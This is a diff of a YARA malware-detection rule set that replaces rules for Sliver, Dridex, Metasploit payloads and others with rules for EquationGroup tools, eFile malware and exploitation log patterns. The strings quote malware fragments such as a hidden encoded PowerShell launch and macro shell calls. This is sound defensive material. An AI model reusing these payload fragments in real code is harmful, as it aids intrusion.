-		$KeyString2 = { 74 79 70 65 3D 22 77 69 6E 33 32 22 20 6E 61 6D 65 3D 22 4D 69 63 72 6F 73 6F 66 74 2E 56 43 39 30 2E 4D 46 43 22 20 76 65 72 73 69 6F 6E 3D 22 39 2E 30 2E 32 31 30 32 32 2E 38 22 20 70 72 6F 63 65 73 73 6F 72 41 72 63 68 69 74 65 63 74 75 72 65 3D 22 78 38 36 22 20 70 75 62 6C 69 63 4B 65 79 54 6F 6B 65 6E 3D 22 31 66 63 38 62 33 62 39 61 31 65 31 38 65 33 62 22 }
-		$Slashes = { 7C 7C 7C 7C 7C 7C 7C 7C 7C 7C 7C 7C 7C 7C 7C 7C 7C 7C 7C 7C }
+		$s1 = "DEC Pathworks TCPIP service on Windows NT" fullword ascii
+		$s2 = "<\\\\__MSBROWSE__> G" fullword ascii
+		$s3 = "<IRISNAMESERVER>" fullword ascii
 
 	condition:
-		filesize < 2MB and filesize > 500KB and uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 and ( all of ( $CommonDLLs* ) ) and ( all of ( $KeyString* ) ) and $Slashes
+		( uint16( 0 ) == 0x5a4d and filesize < 300KB and all of them )
 }
-rule SIGNATURE_BASE_MAL_Backdoor_Win_C3_1 : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17__ELV_ESKE_EVFR_RPC2_15 : FILE
 {
 	meta:
-		description = "Detection to identify the Custom Command and Control (C3) binaries."
-		author = "FireEye"
-		id = "60eb022e-6f4e-5c7d-9ddf-b458a593071e"
-		date = "2021-05-11"
+		description = "Detects EquationGroup Tool - April Leak"
+		author = "Florian Roth (Nextron Systems)"
+		id = "f671a10d-f0b8-5343-97b5-e60b7f2f0acf"
+		date = "2017-04-15"
 		modified = "2023-12-05"
-		reference = "https://www.fireeye.com/blog/threat-research/2021/05/shining-a-light-on-darkside-ransomware-operations.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_ransom_darkside.yar#L58-L77"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L3537-L3555"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "7cdac4b82a7573ae825e5edb48f80be5"
-		logic_hash = "369c54b9426edb449004466d30e1010ecefe8cfbea106306eb8eb90b27610dbf"
+		logic_hash = "6c61d17e1a985deb31bd6e1d603283e77df477b52fce9eb8b6cb4e99b2f9c4dc"
 		score = 75
-		quality = 79
+		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash1 = "f7fad44560bc8cc04f03f1d30b6e1b4c5f049b9a8a45464f43359cbe4d1ce86f"
+		hash2 = "9d16d97a6c964e0658b6cd494b0bbf70674bf37578e2ff32c4779a7936e40556"
+		hash3 = "c5e119ff7b47333f415aea1d2a43cb6cb322f8518562cfb9b90399cac95ac674"
+		hash4 = "5c0896dbafc5d8cc19b1bc7924420b20ed5999ac5bee2cb5a91aada0ea01e337"
 
 	strings:
-		$dropboxAPI = "Dropbox-API-Arg"
-		$knownDLLs1 = "WINHTTP.dll" fullword
-		$knownDLLs2 = "SHLWAPI.dll" fullword
-		$knownDLLs3 = "NETAPI32.dll" fullword
-		$knownDLLs4 = "ODBC32.dll" fullword
-		$tokenString1 = { 5B 78 5D 20 65 72 72 6F 72 20 73 65 74 74 69 6E 67 20 74 6F 6B 65 6E }
-		$tokenString2 = { 5B 78 5D 20 65 72 72 6F 72 20 63 72 65 61 74 69 6E 67 20 54 6F 6B 65 6E }
-		$tokenString3 = { 5B 78 5D 20 65 72 72 6F 72 20 64 75 70 6C 69 63 61 74 69 6E 67 20 74 6F 6B 65 6E }
+		$x1 = "** SendAndReceive ** - EXCEPTION_EXECUTE_HANDLER" fullword ascii
+		$s8 = "Binding to RPC Interface %s over named pipe" fullword ascii
 
 	condition:
-		filesize < 5MB and uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 and ( ( ( all of ( $knownDLLs* ) ) and ( $dropboxAPI or ( 1 of ( $tokenString* ) ) ) ) or ( all of ( $tokenString* ) ) )
+		( uint16( 0 ) == 0x5a4d and filesize < 2000KB and 1 of them )
 }
-rule SIGNATURE_BASE_Octowave_Installer_03_2025 : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17__ELV_ESKE_EVFR_16 : FILE
 {
 	meta:
-		description = "Detects resources embedded within Octowave Loader MSI installers"
-		author = "Jai Minton (@CyberRaiju) - HuntressLabs"
-		id = "56685a0a-523d-4060-a008-aa28542cb85c"
-		date = "2025-03-28"
-		modified = "2025-04-08"
-		reference = "https://x.com/CyberRaiju/status/1893450184224362946?t=u0X6ST2Qgnrf-ujjphGOSg&s=19"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/mal_octowave_installer_mar25.yar#L1-L36"
+		description = "Detects EquationGroup Tool - April Leak"
+		author = "Florian Roth (Nextron Systems)"
+		id = "2749227b-13e2-5669-a557-567ebd170a2f"
+		date = "2017-04-15"
+		modified = "2023-12-05"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L3557-L3578"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "14b6247cf619ecb8f14fc0a860fa4285e58db2defa15488cda1b2431b3e3e980"
+		logic_hash = "3e6c4e013727bbbf3859374af46553067a9fc782f2eca582ea13d8eab03380ce"
 		score = 75
-		quality = 60
+		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "05b025b8475c0acbc9a5d2cd13c15088a2fb452aa514d0636f145e1c4c93e6ee"
-		hash2 = "500462c4fb6e4d0545f04d63ef981d9611b578948e5cfd61d840ff8e2f206587"
-		hash3 = "5ee9e74605b0c26b39b111a89139d95423e54f7a54decf60c7552f45b8b60407"
-		hash4 = "76efc8c64654d8f2318cc513c0aaf0da612423b1715e867b4622712ba0b3926f"
-		hash5 = "c3e2af892b813f3dcba4d0970489652d6f195b7985dc98f08eaddca7727786f0"
-		hash6 = "d7816ba6ddda0c4e833d9bba85864de6b1bd289246fcedae84b8a6581db3f5b6"
-		hash7 = "e93969a57ef2a7aee13a159cbf2015e2c8219d9153078e257b743d5cd90f05cb"
-		hash8 = "45984ae78d18332ecb33fe3371e5eb556c0db86f1d3ba8a835b72cd61a7eeecf"
+		super_rule = 1
+		hash1 = "f7fad44560bc8cc04f03f1d30b6e1b4c5f049b9a8a45464f43359cbe4d1ce86f"
+		hash2 = "9d16d97a6c964e0658b6cd494b0bbf70674bf37578e2ff32c4779a7936e40556"
+		hash3 = "c5e119ff7b47333f415aea1d2a43cb6cb322f8518562cfb9b90399cac95ac674"
 
 	strings:
-		$string1 = "LaunchConditionsValidateProductIDProcessComponentsUnpublishFeaturesRemoveFilesRegisterUserRegisterProductInstalled OR PhysicalMemory >= 2048" ascii
-		$string2 = ".cab" ascii
-		$string3 = ".wav" ascii
-		$string4 = ".dll" ascii
-		$supporting1 = ".raw" ascii
-		$supporting2 = ".db" ascii
-		$supporting3 = ".pak" ascii
-		$supporting4 = ".bin" ascii
-		$supporting5 = ".bak" ascii
-		$supporting6 = ".dat" ascii
+		$x1 = "ERROR: TbMalloc() failed for encoded exploit payload" fullword ascii
+		$x2 = "** EncodeExploitPayload ** - EXCEPTION_EXECUTE_HANDLER" fullword ascii
+		$x4 = "** RunExploit ** - EXCEPTION_EXECUTE_HANDLER" fullword ascii
+		$s6 = "Sending Implant Payload (%d-bytes)" fullword ascii
+		$s7 = "ERROR: Encoder failed on exploit payload" fullword ascii
+		$s11 = "ERROR: VulnerableOS() != RET_SUCCESS" fullword ascii
 
 	condition:
-		( uint32( 0 ) == 0xe011cfd0 ) and filesize < 200000KB and all of ( $string* ) and 1 of ( $supporting* )
+		( uint16( 0 ) == 0x5a4d and filesize < 2000KB and 1 of them )
 }
-rule SIGNATURE_BASE_NK_Miner_Malware_Jan18_1 : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17__ETBL_ETRE_SMBTOUCH_17 : FILE
 {
 	meta:
-		description = "Detects Noth Korean Monero Miner mentioned in AlienVault report"
-		author = "Florian Roth (Nextron Systems) (original rule by Chris Doman)"
-		id = "40f53c36-9e14-5307-9740-e6f514afc7ec"
-		date = "2018-01-09"
+		description = "Detects EquationGroup Tool - April Leak"
+		author = "Florian Roth (Nextron Systems)"
+		id = "88bf610d-1c6e-554a-af82-46b5eb3cc6a5"
+		date = "2017-04-15"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/PChE1z"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_nkminer.yar#L11-L39"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L3580-L3597"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "eb75fe7d70b547a4774b74c01e11479949dfccb8645af330f87b51daaf0d8dbf"
+		logic_hash = "ef86350732b5064035ff58b63202be29e906d2b566af105f03298e3e339eda52"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "0024e32c0199ded445c0b968601f21cc92fc0c534d2642f2dd64c1c978ff01f3"
-		hash2 = "42300b6a09f183ae167d7a11d9c6df21d022a5f02df346350d3d875d557d3b76"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash1 = "70db3ac2c1a10de6ce6b3e7a7890c37bffde006ea6d441f5de6d8329add4d2ef"
+		hash2 = "e0f05f26293e3231e4e32916ad8a6ee944af842410c194fce8a0d8ad2f5c54b2"
+		hash3 = "7da350c964ea43c149a12ac3d2ce4675cedc079ddc10d1f7c464b16688305309"
 
 	strings:
-		$x0 = "c:\\users\\jawhar\\documents\\" ascii
-		$x1 = "C:\\Users\\Jawhar\\documents\\" ascii
-		$x2 = "The number of processors on this computer is {0}." fullword wide
-		$x3 = { 00 00 1F 43 00 3A 00 5C 00 4E 00 65 00 77 00 44
-              00 69 00 72 00 65 00 63 00 74 00 6F 00 72 00 79
-              00 00 }
-		$x4 = "Le fichier Hello txt n'existe pas" fullword wide
-		$x5 = "C:\\NewDirectory2\\info2" fullword wide
-		$a = "82e999fb-a6e0-4094-aa1f-1a306069d1a5" ascii
-		$b = "4JUdGzvrMFDWrUUwY3toJATSeNwjn54LkCnKBPRzDuhzi5vSepHfUckJNxRL2gjkNrSqtCoRUrEDAgRwsQvVCjZbRy5YeFCqgoUMnzumvS" ascii
-		$c = "barjuok.ryongnamsan.edu.kp" wide ascii
-		$d = "C:\\SoftwaresInstall\\soft" wide ascii
-		$e = "C:\\Windows\\Sys64\\intelservice.exe" wide ascii
-		$f = "C:\\Windows\\Sys64\\updater.exe" wide ascii
+		$x1 = "ERROR: Connection terminated by Target (TCP Ack/Fin)" fullword ascii
+		$s2 = "Target did not respond within specified amount of time" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 30KB and 1 of them
+		( uint16( 0 ) == 0x5a4d and filesize < 300KB and 1 of them )
 }
-
-rule SIGNATURE_BASE_Sliver_Implant_32Bit_1
+rule SIGNATURE_BASE_Equationgroup_Scanner_Output : FILE
 {
 	meta:
-		description = "Sliver 32-bit implant (with and without --debug flag at compile)"
-		author = "gssincla@google.com"
-		id = "6bc4d7d1-64cf-5920-8f07-54a8a7a94f26"
-		date = "2022-11-18"
-		modified = "2025-03-21"
-		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_gcti_sliver.yar#L26-L94"
+		description = "Detects output generated by EQGRP scanner.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "a73bc98f-f7b1-5f16-bf23-1d5c9a7a371b"
+		date = "2017-04-17"
+		modified = "2023-12-05"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L3609-L3626"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "911f4106350871ddb1396410d36f2d2eadac1166397e28a553b28678543a9357"
-		logic_hash = "3fec6fbba86a24b395e58f02fb35a60b1b9a4b941b4d85c060cc6159c6aa8265"
+		logic_hash = "a8ac7e7f14d72798a1f6658eae4c66d871a525c8cb49afa2ca8656047da20524"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s_tcppivot = { 81 ?? 74 63 70 70 [2-20] 81 ?? 04 69 76 6F 74  }
-		$s_wg = { 66 81 ?? 77 67 }
-		$s_dns = { 66 81 ?? 64 6E [2-20] 80 ?? 02 73 }
-		$s_http = { 81 ?? 68 74 74 70 }
-		$s_https = { 81 ?? 68 74 74 70 [2-20] 80 ?? 04 73 }
-		$s_mtls = { 81 ?? 6D 74 6C 73 }
-		$fp1 = "cloudfoundry" ascii fullword
-		$fp2 = "googleapi.Error" ascii
+		$s0 = "# scanning ip  " ascii
+		$s1 = "# Scan for windows boxes" ascii fullword
+		$s2 = "Going into send" ascii fullword
+		$s3 = "# Does not work" ascii fullword
+		$s4 = "You are the weakest link, goodbye" ascii fullword
+		$s5 = "rpc   Scan for RPC  folks" ascii fullword
 
 	condition:
-		4 of ( $s* ) and not 1 of ( $fp* ) and not pe.number_of_signatures > 0
+		filesize < 1000KB and 2 of them
 }
-
-rule SIGNATURE_BASE_Sliver_Implant_64Bit_1
+rule SIGNATURE_BASE_SUSP_LNK_Big_Link_File : FILE
 {
 	meta:
-		description = "Sliver 64-bit implant (with and without --debug flag at compile)"
-		author = "gssincla@google.com"
-		id = "b84db933-0e11-5871-821d-43697c015665"
-		date = "2022-11-18"
-		modified = "2025-03-21"
-		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_gcti_sliver.yar#L112-L183"
+		description = "Detects a suspiciously big LNK file - maybe with embedded content"
+		author = "Florian Roth (Nextron Systems)"
+		id = "e130f213-53fc-56d6-b1d5-0508a7e18e61"
+		date = "2018-05-15"
+		modified = "2023-12-05"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_susp_lnk.yar#L2-L12"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "2d1c9de42942a16c88a042f307f0ace215cdc67241432e1152080870fe95ea87"
-		logic_hash = "ccfd944a5bc6521c89d44572910e2998e2404d472a593f9d97224d606d247bcd"
-		score = 75
+		logic_hash = "6e44483583249939494e76f14b022e698ba59dfe8b58133a69135144ef60c743"
+		score = 65
 		quality = 85
-		tags = ""
-
-	strings:
-		$s_tcppivot = { 48 ?? 74 63 70 70 69 76 6F 74 }
-		$s_namedpipe = { 48 ?? 6E 61 6D 65 64 70 69 70 [2-32] 80 ?? 08 65 }
-		$s_https = { 81 ?? 68 74 74 70 [2-32] 80 ?? 04 73 }
-		$s_wg = {66 81 ?? 77 67}
-		$s_dns = { 66 81 ?? 64 6E [2-20] 80 ?? 02 73 }
-		$s_mtls = {  81 ?? 6D 74 6C 73  }
-		$fp1 = "cloudfoundry" ascii fullword
-		$fp2 = "googleapi.Error" ascii
+		tags = "FILE"
 
 	condition:
-		5 of ( $s* ) and not 1 of ( $fp* ) and not pe.number_of_signatures > 0
+		uint16( 0 ) == 0x004c and uint32( 4 ) == 0x00021401 and filesize > 200KB
 }
-
-rule SIGNATURE_BASE_Crime_Win32_Dridex_Socks5_Mod
+rule SIGNATURE_BASE_MAL_JS_Efile_Apr23_1
 {
 	meta:
-		description = "Detects Dridex socks5 module"
-		author = "@VK_Intel"
-		id = "cee256b1-ad80-55dd-bbd3-0d3f7bc49664"
-		date = "2020-04-06"
+		description = "Detects JavaScript malware used in eFile compromise"
+		author = "Florian Roth"
+		id = "ba7a8b2c-789c-5bc5-be53-f2b92c7039e1"
+		date = "2023-04-06"
 		modified = "2023-12-05"
-		reference = "https://twitter.com/VK_Intel/status/1247058432223477760"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_evilcorp_dridex_banker.yar#L8-L20"
+		reference = "https://twitter.com/Ax_Sharma/status/1643178696084271104/photo/1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/mal_efile_apr23.yar#L2-L15"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "5ca09e9c7d94e949e453d1bb69b566c12b253579cbcae700929d4f517df35a0a"
+		logic_hash = "6d94162e5719b92d9df349e7d48cd70e218998b0e120870a435a8073fa49c532"
 		score = 75
 		quality = 85
 		tags = ""
 
 	strings:
-		$s0 = "socks5_2_x32.dll"
-		$s1 = "socks5_2_x64.dll"
+		$s1 = "let payload_chrome = "
+		$s2 = "else if (agent.indexOf(\"firefox"
 
 	condition:
-		any of ( $s* ) and pe.exports ( "start" )
+		all of them
 }
-
-rule SIGNATURE_BASE_Crime_Win32_Hvnc_Banker_Gen
+rule SIGNATURE_BASE_MAL_PHP_Efile_Apr23_1
 {
 	meta:
-		description = "Detects malware banker hidden VNC"
-		author = "@VK_Intel"
-		id = "5e13f4a9-2231-524f-82b2-fbc6d6a43b6f"
-		date = "2020-04-06"
+		description = "Detects malware "
+		author = "Florian Roth"
+		id = "d663b38e-b082-5cf7-9853-f4685bf3a87b"
+		date = "2023-04-06"
 		modified = "2023-12-05"
-		reference = "https://twitter.com/VK_Intel/status/1247058432223477760"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_evilcorp_dridex_banker.yar#L22-L31"
+		reference = "https://twitter.com/malwrhunterteam/status/1642988428080865281?s=12&t=C0_T_re0wRP_NfKa27Xw9w"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/mal_efile_apr23.yar#L18-L32"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "b01af685c3826834aadaf4eac1f1d8171db288a2efa7b769d8122421f7af8d7e"
+		logic_hash = "ec4ac3f5c19f506a70eacb5fe3173cc06bf20567bbc9a96f3b269910382e5fa2"
 		score = 75
 		quality = 85
 		tags = ""
 
+	strings:
+		$s1 = "mt_rand( 0, 0xffff ), mt_rand( 0, 0xffff )" ascii
+		$s2 = "C:\\\\ProgramData\\\\Browsers" ascii fullword
+		$s3 = "curl_https($api_url." ascii
+
 	condition:
-		pe.exports( "VncStartServer" ) and pe.exports ( "VncStopServer" )
+		all of them
 }
-rule SIGNATURE_BASE_Msfpayloads_Msf : FILE
+rule SIGNATURE_BASE_PUP_Computraceagent : FILE
 {
 	meta:
-		description = "Metasploit Payloads - file msf.sh"
-		author = "Florian Roth (Nextron Systems)"
-		id = "c56dbb8e-1e03-5112-b2ef-a0adfd14dffa"
-		date = "2017-02-09"
-		modified = "2022-08-18"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_metasploit_payloads.yar#L10-L23"
+		description = "Absolute Computrace Agent Executable"
+		author = "ASERT - Arbor Networks (slightly modified by Florian Roth)"
+		id = "676f8f1e-a3b4-5d05-b13b-bd6cb0aabbbd"
+		date = "2018-05-01"
+		modified = "2023-12-05"
+		reference = "https://asert.arbornetworks.com/lojack-becomes-a-double-agent/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_fancybear_computrace_agent.yar#L1-L14"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "4f0eab53a135242c7891b8c88e937a854c945a10000ca4cbf7b21f4596dca410"
+		logic_hash = "65e964e68be1e286ab3aa39677e250cf5994a7a08d0f6db286c0260cf77d6c48"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "320a01ec4e023fb5fbbaef963a2b57229e4f918847e5a49c7a3f631cb556e96c"
 
 	strings:
-		$s1 = "export buf=\\" ascii
+		$a = { D1 E0 F5 8B 4D 0C 83 D1 00 8B EC FF 33 83 C3 04 }
+		$b1 = { 72 70 63 6E 65 74 70 2E 65 78 65 00 72 70 63 6E 65 74 70 00 }
+		$b2 = { 54 61 67 49 64 00 }
 
 	condition:
-		filesize < 5MB and $s1
+		uint16( 0 ) == 0x5a4d and filesize < 40KB and ( $a or ( $b1 and $b2 ) )
 }
-rule SIGNATURE_BASE_Msfpayloads_Msf_2
+rule SIGNATURE_BASE_CVE_2015_1701_Taihou : CVE_2015_1701 FILE
 {
 	meta:
-		description = "Metasploit Payloads - file msf.asp"
+		description = "CVE-2015-1701 compiled exploit code"
 		author = "Florian Roth (Nextron Systems)"
-		id = "ec1ae1b6-18a3-5590-ae15-1e2b362c545a"
-		date = "2017-02-09"
+		id = "58250e17-aa46-5451-ae6d-18fb4030f8df"
+		date = "2015-05-13"
 		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_metasploit_payloads.yar#L25-L40"
+		reference = "http://goo.gl/W4nU0q"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/exploit_cve_2015_1701.yar#L2-L28"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "8f803a5d71a084e1ea453638bdeaa2dd590a1912be652b74b065d9afd332ffa2"
-		score = 75
+		logic_hash = "d230e036c303642c40bdf83be2b097f6e447a7e7d4292c495179edbae8a4124c"
+		score = 70
 		quality = 85
-		tags = ""
+		tags = "CVE-2015-1701, FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "e52f98466b92ee9629d564453af6f27bd3645e00a9e2da518f5a64a33ccf8eb5"
+		hash1 = "90d17ebd75ce7ff4f15b2df951572653efe2ea17"
+		hash2 = "acf181d6c2c43356e92d4ee7592700fa01e30ffb"
+		hash3 = "b8aabe12502f7d55ae332905acee80a10e3bc399"
+		hash4 = "d9989a46d590ebc792f14aa6fec30560dfe931b1"
+		hash5 = "63d1d33e7418daf200dc4660fc9a59492ddd50d9"
 
 	strings:
-		$s1 = "& \"\\\" & \"svchost.exe\"" fullword ascii
-		$s2 = "CreateObject(\"Wscript.Shell\")" fullword ascii
-		$s3 = "<% @language=\"VBScript\" %>" fullword ascii
+		$s3 = "VirtualProtect" fullword
+		$s4 = "RegisterClass"
+		$s5 = "LoadIcon"
+		$s6 = "PsLookupProcessByProcessId" fullword ascii
+		$s7 = "LoadLibraryExA" fullword ascii
+		$s8 = "gSharedInfo" fullword
+		$w1 = "user32.dll" wide
+		$w2 = "ntdll" wide
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5a4d and filesize < 160KB and all of ( $s* ) and 1 of ( $w* )
 }
-rule SIGNATURE_BASE_Msfpayloads_Msf_Psh
+rule SIGNATURE_BASE_EXPL_Exchange_Proxynotshell_Patterns_CVE_2022_41040_Oct22_1 : SCRIPT
 {
 	meta:
-		description = "Metasploit Payloads - file msf-psh.vba"
+		description = "Detects successful ProxyNotShell exploitation attempts in log files (attempt to identify the attack before the official release of detailed information)"
 		author = "Florian Roth (Nextron Systems)"
-		id = "5b760f03-b0f8-5871-bd34-e7e44443530c"
-		date = "2017-02-09"
-		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_metasploit_payloads.yar#L42-L57"
+		id = "d2812fcd-0a20-5bbd-a9e1-9cca1ed58aa3"
+		date = "2022-10-11"
+		modified = "2023-03-15"
+		old_rule_name = "EXPL_Exchange_ProxyNoShell_Patterns_CVE_2022_41040_Oct22_1"
+		reference = "https://github.com/kljunowsky/CVE-2022-41040-POC"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_cve_2022_41040_proxynoshell.yar#L2-L26"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "2e6015e8c91ccd8647e78220d10c2d704867369d962b734bb4522a1213be2f2d"
+		logic_hash = "81b0f0fea2762beb47826ff95545c87e960e098b9d5f45eacfe07b3ecf319ac5"
 		score = 75
-		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "5cc6c7f1aa75df8979be4a16e36cece40340c6e192ce527771bdd6463253e46f"
+		quality = 60
+		tags = "SCRIPT"
 
 	strings:
-		$s1 = "powershell.exe -nop -w hidden -e" ascii
-		$s2 = "Call Shell(" ascii
-		$s3 = "Sub Workbook_Open()" fullword ascii
+		$sr1 = / \/autodiscover\/autodiscover\.json[^\n]{1,300}owershell/ nocase ascii
+		$sa1 = " 200 "
+		$fp1 = " 444 "
+		$fp2 = " 404 "
+		$fp2b = " 401 "
+		$fp3 = "GET /owa/ &Email=autodiscover/autodiscover.json%3F@test.com&ClientId=" ascii
+		$fp4 = "@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com" ascii
 
 	condition:
-		all of them
+		$sr1 and 1 of ( $sa* ) and not 1 of ( $fp* )
 }
-rule SIGNATURE_BASE_Msfpayloads_Msf_Exe
+rule SIGNATURE_BASE_Connectwise_Screenconnect_Authentication_Bypass_Feb_2024_Exploitation_IIS_Logs
 {
 	meta:
-		description = "Metasploit Payloads - file msf-exe.vba"
-		author = "Florian Roth (Nextron Systems)"
-		id = "fd07240e-0ee0-5318-a436-d97054e92414"
-		date = "2017-02-09"
-		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_metasploit_payloads.yar#L59-L77"
+		description = "Detects an http request to '/SetupWizard.aspx/' with anything following it, which when found in IIS logs is a potential indicator of compromise of the 2024 ConnectWise ScreenConnect (versions prior to 23.9.8) vulnerability that allows an Authentication Bypass"
+		author = "Huntress DE&TH Team (modified by Florian Roth)"
+		id = "2886530b-e164-4c4b-b01e-950e3c40acb4"
+		date = "2024-02-20"
+		modified = "2024-02-21"
+		reference = "https://www.connectwise.com/company/trust/security-bulletins/connectwise-screenconnect-23.9.8"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_connectwise_screenconnect_vuln_feb24.yar#L3-L18"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "3baa242e90dd845e022785101ebc2d5c0d84007d20aef6a2bb6a9a8c6280d4eb"
+		logic_hash = "f6c7a3aa2ed98e754f9523c55eb035c7bc5f8aea96a6f86c729e9658d78710fb"
 		score = 75
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "321537007ea5052a43ffa46a6976075cee6a4902af0c98b9fd711b9f572c20fd"
 
 	strings:
-		$s1 = "'* PAYLOAD DATA" fullword ascii
-		$s2 = " = Shell(" ascii
-		$s3 = "= Environ(\"USERPROFILE\")" fullword ascii
-		$s4 = "'**************************************************************" fullword ascii
-		$s5 = "ChDir (" ascii
-		$s6 = "'* MACRO CODE" fullword ascii
+		$s1 = " GET /SetupWizard.aspx/" ascii
+		$s2 = " POST /SetupWizard.aspx/" ascii
+		$s3 = " PUT /SetupWizard.aspx/" ascii
+		$s4 = " HEAD /SetupWizard.aspx/" ascii
 
 	condition:
-		4 of them
+		1 of them
 }
-rule SIGNATURE_BASE_Msfpayloads_Msf_3
+rule SIGNATURE_BASE_SUSP_Screenconnect_User_Poc_Com_Unused_Feb24 : FILE
 {
 	meta:
-		description = "Metasploit Payloads - file msf.psh"
-		author = "Florian Roth (Nextron Systems)"
-		id = "ad09167f-a12a-5f07-940b-df679fa8e6c0"
-		date = "2017-02-09"
-		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_metasploit_payloads.yar#L79-L102"
